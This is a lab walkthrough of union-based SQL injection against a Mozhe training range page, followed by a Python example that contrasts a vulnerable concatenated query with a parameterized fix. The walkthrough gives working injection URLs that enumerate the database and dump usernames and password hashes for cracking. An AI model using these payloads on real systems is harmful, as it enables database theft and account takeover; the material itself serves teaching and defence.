Mozhe Learning
By/shy014
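Address: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
1. Log in to the Mozhe range, select this target machine, and start it
2. Enter the range and find the familiar notice
3. Testing shows that a SQL injection vulnerability exists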
http://219.153.49.228:45391/new_list.php?id=1%20and%201=2
4. Determine the number of columns
http://219.153.49.228:45391/new_list.php?id=1%20order%20by%204
5. Determine which column positions are echoed back in the page
http://219.153.49.228:45391/new_list.php?id=-1%20union%20select%201,2,3,4
6. Determine the current user name and database
http://219.153.49.228:45391/new_list.php?id=-1%20union%20select%201,database(),user(),4
7. Read the database names
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--+
8. Read the table names
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='sys'--+
This is not the right one
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'--+
9. Read the column names
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'--+
10. Read the contents
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(id,name,password,status),3,4 from StormGroup_member--+
http://219.153.49.228:45391/new_list.php
?id=-1 union select 1,group_concat(id,name,password),3,4 from StormGroup_member--+
11. Decrypt the MD5 hash
12. Log in and obtain the key
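
Why the values in steps 3 and 5 change the query result, and what the server-side fix looks like, as an added example that is not part of the original walkthrough or the lab's own code. Python with an in-memory SQLite database stands in for the lab's PHP page and its database; the table `news`, its columns and the function names are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data: one 4-column table, matching the column
    # count found in steps 4-5. Table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'Maintenance notice', 'constructed body', 'admin')")
    return db

def get_news_vulnerable(db, raw_id):
    # The request value is pasted into the SQL text, so the database parses
    # "and 1=2" or "union select ..." as part of the statement.
    sql = "SELECT id, title, body, author FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def get_news_hardened(db, raw_id):
    # Allow-list first: the id must be a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # the caller would answer 400 Bad Request
    # Bound parameter: the value is sent as data and never parsed as SQL.
    sql = "SELECT id, title, body, author FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Values taken from steps 3 and 5 of the walkthrough, URL-decoded.
    for value in ["1", "1 and 1=2", "-1 union select 1,2,3,4"]:
        print(repr(value), get_news_vulnerable(db, value), get_news_hardened(db, value))
```

In the vulnerable function the second value empties the result and the third returns the injected row `(1, 2, 3, 4)`; the hardened function rejects both before any query runs.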